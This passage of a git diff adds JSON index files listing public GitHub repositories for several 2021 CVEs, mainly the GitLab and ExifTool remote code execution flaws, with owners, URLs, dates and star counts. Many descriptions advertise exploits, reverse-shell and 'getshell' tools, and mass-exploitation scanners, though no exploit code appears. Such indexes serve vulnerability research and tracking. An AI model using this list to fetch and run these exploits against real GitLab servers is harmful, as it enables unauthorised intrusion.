"https:\/\/github.com\/niceeeeeeee\/CVE-2021-22145-poc", + "description": null, + "fork": false, + "created_at": "2023-08-31T07:56:03Z", + "updated_at": "2023-08-31T08:10:17Z", + "pushed_at": "2023-08-31T08:10:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22146.json b/2021/CVE-2021-22146.json new file mode 100644 index 0000000000..a46e631f33 --- /dev/null +++ b/2021/CVE-2021-22146.json @@ -0,0 +1,33 @@ +[ + { + "id": 388358547, + "name": "cve-2021-22146", + "full_name": "magichk\/cve-2021-22146", + "owner": { + "login": "magichk", + "id": 17543960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17543960?v=4", + "html_url": "https:\/\/github.com\/magichk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/magichk\/cve-2021-22146", + "description": null, + "fork": false, + "created_at": "2021-07-22T06:50:34Z", + "updated_at": "2024-08-12T20:14:53Z", + "pushed_at": "2021-07-26T16:27:49Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22192.json b/2021/CVE-2021-22192.json new file mode 100644 index 0000000000..c39024d9bb --- /dev/null +++ b/2021/CVE-2021-22192.json @@ -0,0 +1,64 @@ +[ + { + "id": 352006763, + "name": "CVE-2021-22192", + "full_name": "EXP-Docs\/CVE-2021-22192", + "owner": { + "login": "EXP-Docs", + "id": 132466462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132466462?v=4", + "html_url": "https:\/\/github.com\/EXP-Docs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EXP-Docs\/CVE-2021-22192", + "description": "CVE-2021-22192 靶场: 未授权用户 RCE 漏洞", + "fork": false, + "created_at": "2021-03-27T07:09:46Z", + "updated_at": "2024-03-25T17:09:20Z", + "pushed_at": "2023-01-24T10:35:03Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 36, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 360465836, + "name": "Gitlab-RCE", + "full_name": "PetrusViet\/Gitlab-RCE", + "owner": { + "login": "PetrusViet", + "id": 63145078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63145078?v=4", + "html_url": "https:\/\/github.com\/PetrusViet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PetrusViet\/Gitlab-RCE", + "description": "CVE-2021-22192", + "fork": false, + "created_at": "2021-04-22T09:35:57Z", + "updated_at": "2024-08-12T20:12:23Z", + "pushed_at": "2021-04-28T04:39:38Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22201.json b/2021/CVE-2021-22201.json new file mode 100644 index 0000000000..1d3bc32ad8 --- /dev/null +++ b/2021/CVE-2021-22201.json @@ -0,0 +1,33 @@ +[ + { + "id": 376590691, + "name": "CVE-2021-22201", + "full_name": "exp1orer\/CVE-2021-22201", + "owner": { + "login": "exp1orer", + "id": 25338973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25338973?v=4", + "html_url": "https:\/\/github.com\/exp1orer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exp1orer\/CVE-2021-22201", + "description": "CVE-2021–22201 Arbitrary file read on Gitlab ", + "fork": false, + "created_at": "2021-06-13T16:30:47Z", + "updated_at": "2021-10-22T09:53:12Z", + "pushed_at": "2021-06-13T16:55:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22204.json b/2021/CVE-2021-22204.json new file mode 100644 index 0000000000..af05a35c76 --- /dev/null +++ b/2021/CVE-2021-22204.json @@ -0,0 +1,452 @@ +[ + { + "id": 366482211, + "name": "CVE-2021-22204-exiftool", + "full_name": "convisolabs\/CVE-2021-22204-exiftool", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2021-22204-exiftool", + "description": "Python exploit for the CVE-2021-22204 vulnerability in Exiftool", + "fork": false, + "created_at": "2021-05-11T18:45:07Z", + "updated_at": "2024-11-26T11:18:21Z", + "pushed_at": "2021-05-20T21:42:43Z", + "stargazers_count": 90, + "watchers_count": 90, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exiftool" + ], + "visibility": "public", + "forks": 27, + "watchers": 90, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 366651752, + "name": "CVE-2021-22204", + "full_name": "se162xg\/CVE-2021-22204", + "owner": { + "login": "se162xg", + "id": 64580307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64580307?v=4", + "html_url": "https:\/\/github.com\/se162xg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/se162xg\/CVE-2021-22204", + "description": "exiftool arbitrary code execution vulnerability", + "fork": false, + "created_at": "2021-05-12T08:51:44Z", + "updated_at": "2024-08-12T20:12:56Z", + "pushed_at": "2021-05-12T09:09:56Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 369369026, + "name": "POC-CVE-2021-22204", + "full_name": "bilkoh\/POC-CVE-2021-22204", + "owner": { + "login": "bilkoh", + "id": 43228593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43228593?v=4", + "html_url": "https:\/\/github.com\/bilkoh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bilkoh\/POC-CVE-2021-22204", + "description": "POC for exiftool vuln (CVE-2021-22204).", + "fork": false, + "created_at": "2021-05-21T00:14:52Z", + "updated_at": "2024-08-12T20:13:12Z", + "pushed_at": "2021-05-21T00:17:10Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 391882871, + "name": "CVE-2021-22204", + "full_name": "PenTestical\/CVE-2021-22204", + "owner": { + "login": "PenTestical", + "id": 57206134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57206134?v=4", + "html_url": "https:\/\/github.com\/PenTestical", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenTestical\/CVE-2021-22204", + "description": null, + "fork": false, + "created_at": "2021-08-02T09:11:27Z", + "updated_at": "2022-07-21T00:41:01Z", + "pushed_at": "2021-08-02T13:30:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 392061786, + "name": "CVE-2021-22204", + "full_name": "AssassinUKG\/CVE-2021-22204", + "owner": { + "login": "AssassinUKG", + "id": 5285547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4", + "html_url": "https:\/\/github.com\/AssassinUKG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2021-22204", + "description": null, + "fork": false, + "created_at": "2021-08-02T18:56:16Z", + "updated_at": "2024-01-19T17:39:12Z", + "pushed_at": "2021-10-26T16:51:48Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 424626163, + "name": "CVE-2021-22204-Gitlab", + "full_name": "ph-arm\/CVE-2021-22204-Gitlab", + "owner": { + "login": "ph-arm", + "id": 35294934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35294934?v=4", + "html_url": "https:\/\/github.com\/ph-arm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph-arm\/CVE-2021-22204-Gitlab", + "description": "Modification of gitlab exploit anything under 13.10", + "fork": false, + "created_at": "2021-11-04T14:31:02Z", + "updated_at": "2022-03-01T17:55:55Z", + "pushed_at": "2021-11-04T14:39:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435659288, + "name": "CVE-2021-22204-RSE", + "full_name": "Asaad27\/CVE-2021-22204-RSE", + "owner": { + "login": "Asaad27", + "id": 54289666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54289666?v=4", + "html_url": "https:\/\/github.com\/Asaad27", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Asaad27\/CVE-2021-22204-RSE", + "description": "reverse shell execution exploit of CVE 22204", + "fork": false, + "created_at": "2021-12-06T21:53:55Z", + "updated_at": "2021-12-08T18:24:25Z", + "pushed_at": "2021-12-08T18:24:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 442784926, + "name": "CVE-2021-22204", + "full_name": "trganda\/CVE-2021-22204", + "owner": { + "login": "trganda", + "id": 62204882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4", + "html_url": "https:\/\/github.com\/trganda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trganda\/CVE-2021-22204", + "description": null, + "fork": false, + "created_at": "2021-12-29T13:41:35Z", + "updated_at": "2024-10-16T06:11:08Z", + "pushed_at": "2021-12-29T13:55:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453576046, + "name": "CVE-2021-22204", + "full_name": "0xBruno\/CVE-2021-22204", + "owner": { + "login": "0xBruno", + "id": 59654121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59654121?v=4", + "html_url": "https:\/\/github.com\/0xBruno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xBruno\/CVE-2021-22204", + "description": "A complete PoC for CVE-2021-22204 exiftool RCE ", + "fork": false, + "created_at": "2022-01-30T03:11:56Z", + "updated_at": "2022-08-05T03:45:13Z", + "pushed_at": "2022-01-30T03:17:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 461823605, + "name": "CVE-2021-22204-exiftool", + "full_name": "mr-tuhin\/CVE-2021-22204-exiftool", + "owner": { + "login": "mr-tuhin", + "id": 53522759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53522759?v=4", + "html_url": "https:\/\/github.com\/mr-tuhin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-tuhin\/CVE-2021-22204-exiftool", + "description": "exiftool exploit", + "fork": false, + "created_at": "2022-02-21T11:07:19Z", + "updated_at": "2024-11-08T19:49:08Z", + "pushed_at": "2022-02-21T12:20:15Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482377691, + "name": "exploit-CVE-2021-22204", + "full_name": "UNICORDev\/exploit-CVE-2021-22204", + "owner": { + "login": "UNICORDev", + "id": 103281826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4", + "html_url": "https:\/\/github.com\/UNICORDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2021-22204", + "description": "Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution", + "fork": false, + "created_at": "2022-04-16T22:49:47Z", + "updated_at": "2024-10-02T07:11:43Z", + "pushed_at": "2022-06-07T23:09:29Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": true, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-22204", + "djvu", + "exiftool", + "exploit", + "hackthebox", + "linux", + "penetration-testing", + "proof-of-concept", + "python", + "unicord", + "vulnerability" + ], + "visibility": "public", + "forks": 4, + "watchers": 39, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 640427326, + "name": "CVE-2021-22204", + "full_name": "Akash7350\/CVE-2021-22204", + "owner": { + "login": "Akash7350", + "id": 104816473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104816473?v=4", + "html_url": "https:\/\/github.com\/Akash7350", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akash7350\/CVE-2021-22204", + "description": null, + "fork": false, + "created_at": "2023-05-14T03:43:28Z", + "updated_at": "2024-05-18T06:57:38Z", + "pushed_at": "2023-05-14T04:01:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670638630, + "name": "dejavu", + "full_name": "battleofthebots\/dejavu", + "owner": { + "login": "battleofthebots", + "id": 122462368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122462368?v=4", + "html_url": "https:\/\/github.com\/battleofthebots", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/battleofthebots\/dejavu", + "description": "Challenge based on CVE-2021-22204 where users send a malicious file to a web application to gain RCE", + "fork": false, + "created_at": "2023-07-25T13:52:01Z", + "updated_at": "2023-10-16T10:21:15Z", + "pushed_at": "2023-10-11T22:19:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812063180, + "name": "CVE-2021-22204", + "full_name": "cc3305\/CVE-2021-22204", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2021-22204", + "description": "CVE-2021-22204 exploit script", + "fork": false, + "created_at": "2024-06-07T21:57:22Z", + "updated_at": "2024-06-19T16:06:58Z", + "pushed_at": "2024-06-19T16:06:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22205.json b/2021/CVE-2021-22205.json new file mode 100644 index 0000000000..969955b427 --- /dev/null +++ b/2021/CVE-2021-22205.json @@ -0,0 +1,890 @@ +[ + { + "id": 374151679, + "name": "Gitlab-CVE-2021-22205", + "full_name": "mr-r3bot\/Gitlab-CVE-2021-22205", + "owner": { + "login": "mr-r3bot", + "id": 37280106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37280106?v=4", + "html_url": "https:\/\/github.com\/mr-r3bot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3bot\/Gitlab-CVE-2021-22205", + "description": null, + "fork": false, + "created_at": "2021-06-05T15:42:16Z", + "updated_at": "2024-08-12T20:13:39Z", + "pushed_at": "2021-11-02T14:45:24Z", + "stargazers_count": 183, + "watchers_count": 183, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 183, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 422090493, + "name": "CVE-2021-22205", + "full_name": "XTeam-Wing\/CVE-2021-22205", + "owner": { + "login": "XTeam-Wing", + "id": 25416365, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25416365?v=4", + "html_url": "https:\/\/github.com\/XTeam-Wing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XTeam-Wing\/CVE-2021-22205", + "description": "Pocsuite3 For CVE-2021-22205", + "fork": false, + "created_at": "2021-10-28T06:29:37Z", + "updated_at": "2024-08-12T20:17:36Z", + "pushed_at": "2021-10-28T08:54:26Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 87, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422227118, + "name": "CVE-2021-22205", + "full_name": "r0eXpeR\/CVE-2021-22205", + "owner": { + "login": "r0eXpeR", + "id": 46040186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46040186?v=4", + "html_url": "https:\/\/github.com\/r0eXpeR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0eXpeR\/CVE-2021-22205", + "description": "CVE-2021-22205 Unauthorized RCE", + "fork": false, + "created_at": "2021-10-28T14:02:51Z", + "updated_at": "2024-08-12T20:17:37Z", + "pushed_at": "2021-10-28T14:20:05Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 69, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 422439214, + "name": "CVE-2021-22205", + "full_name": "ZZ-SOCMAP\/CVE-2021-22205", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2021-22205", + "description": "Gitlab CE\/EE RCE 未授权远程代码执行漏洞 POC && EXP CVE-2021-22205", + "fork": false, + "created_at": "2021-10-29T04:15:00Z", + "updated_at": "2024-09-19T01:57:43Z", + "pushed_at": "2021-11-04T02:17:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422441947, + "name": "CVE-2021-22205", + "full_name": "Al1ex\/CVE-2021-22205", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-22205", + "description": "CVE-2021-22205& GitLab CE\/EE RCE", + "fork": false, + "created_at": "2021-10-29T04:30:45Z", + "updated_at": "2024-11-22T14:46:16Z", + "pushed_at": "2022-11-16T08:14:33Z", + "stargazers_count": 267, + "watchers_count": 267, + "has_discussions": false, + "forks_count": 99, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-22205" + ], + "visibility": "public", + "forks": 99, + "watchers": 267, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 422768409, + "name": "CVE-2021-22205", + "full_name": "whwlsfb\/CVE-2021-22205", + "owner": { + "login": "whwlsfb", + "id": 8212964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8212964?v=4", + "html_url": "https:\/\/github.com\/whwlsfb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whwlsfb\/CVE-2021-22205", + "description": "CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖,可在win平台使用", + "fork": false, + "created_at": "2021-10-30T02:56:34Z", + "updated_at": "2024-10-16T07:07:32Z", + "pushed_at": "2021-10-30T03:04:03Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 422867551, + "name": "GitLab-preauth-RCE_CVE-2021-22205", + "full_name": "findneo\/GitLab-preauth-RCE_CVE-2021-22205", + "owner": { + "login": "findneo", + "id": 26852341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26852341?v=4", + "html_url": "https:\/\/github.com\/findneo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/findneo\/GitLab-preauth-RCE_CVE-2021-22205", + "description": "PoC in single line bash", + "fork": false, + "created_at": "2021-10-30T11:54:29Z", + "updated_at": "2023-09-08T12:31:48Z", + "pushed_at": "2021-10-30T12:01:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 423050288, + "name": "CVE-2021-22205", + "full_name": "Seals6\/CVE-2021-22205", + "owner": { + "login": "Seals6", + "id": 49613759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49613759?v=4", + "html_url": "https:\/\/github.com\/Seals6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Seals6\/CVE-2021-22205", + "description": "CVE-2021-22205未授权漏洞批量检测与利用工具", + "fork": false, + "created_at": "2021-10-31T04:15:30Z", + "updated_at": "2024-08-07T07:07:28Z", + "pushed_at": "2021-11-04T12:49:58Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-22205" + ], + "visibility": "public", + "forks": 6, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423172219, + "name": "CVE-2021-22205", + "full_name": "c0okB\/CVE-2021-22205", + "owner": { + "login": "c0okB", + "id": 57324119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57324119?v=4", + "html_url": "https:\/\/github.com\/c0okB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0okB\/CVE-2021-22205", + "description": "CVE-2021-22205 RCE ", + "fork": false, + "created_at": "2021-10-31T14:34:51Z", + "updated_at": "2024-11-16T19:51:56Z", + "pushed_at": "2022-07-04T06:46:34Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423355188, + "name": "CVE-2021-22205-getshell", + "full_name": "shang159\/CVE-2021-22205-getshell", + "owner": { + "login": "shang159", + "id": 20499503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20499503?v=4", + "html_url": "https:\/\/github.com\/shang159", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shang159\/CVE-2021-22205-getshell", + "description": "CVE-2021-22205-getshell", + "fork": false, + "created_at": "2021-11-01T06:06:04Z", + "updated_at": "2021-11-03T15:30:34Z", + "pushed_at": "2021-11-01T07:30:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424530553, + "name": "CVE-2021-22205", + "full_name": "devdanqtuan\/CVE-2021-22205", + "owner": { + "login": "devdanqtuan", + "id": 88175750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88175750?v=4", + "html_url": "https:\/\/github.com\/devdanqtuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devdanqtuan\/CVE-2021-22205", + "description": "CVE-2021-22205& GitLab CE\/EE RCE", + "fork": false, + "created_at": "2021-11-04T09:01:07Z", + "updated_at": "2021-11-04T09:01:59Z", + "pushed_at": "2024-01-20T06:11:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424839096, + "name": "cve-2021-22205", + "full_name": "hh-hunter\/cve-2021-22205", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/cve-2021-22205", + "description": null, + "fork": false, + "created_at": "2021-11-05T05:35:10Z", + "updated_at": "2021-11-05T16:30:25Z", + "pushed_at": "2021-11-05T16:30:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 425022767, + "name": "GitLab-CVE-2021-22205-", + "full_name": "runsel\/GitLab-CVE-2021-22205-", + "owner": { + "login": "runsel", + "id": 10703119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10703119?v=4", + "html_url": "https:\/\/github.com\/runsel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/runsel\/GitLab-CVE-2021-22205-", + "description": "Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2021-11-05T16:56:06Z", + "updated_at": "2023-09-08T04:36:51Z", + "pushed_at": "2021-11-05T17:05:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 426338911, + "name": "GitLab-CVE-2021-22205-scanner", + "full_name": "faisalfs10x\/GitLab-CVE-2021-22205-scanner", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/GitLab-CVE-2021-22205-scanner", + "description": null, + "fork": false, + "created_at": "2021-11-09T18:19:43Z", + "updated_at": "2024-07-17T14:31:43Z", + "pushed_at": "2021-11-12T07:40:09Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "gitlab", + "poc", + "scanner", + "shodan-python" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 426870978, + "name": "CVE-2021-22205", + "full_name": "inspiringz\/CVE-2021-22205", + "owner": { + "login": "inspiringz", + "id": 47313597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47313597?v=4", + "html_url": "https:\/\/github.com\/inspiringz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inspiringz\/CVE-2021-22205", + "description": "GitLab CE\/EE Preauth RCE using ExifTool", + "fork": false, + "created_at": "2021-11-11T04:34:07Z", + "updated_at": "2024-11-08T02:44:04Z", + "pushed_at": "2022-01-16T15:54:14Z", + "stargazers_count": 220, + "watchers_count": 220, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + 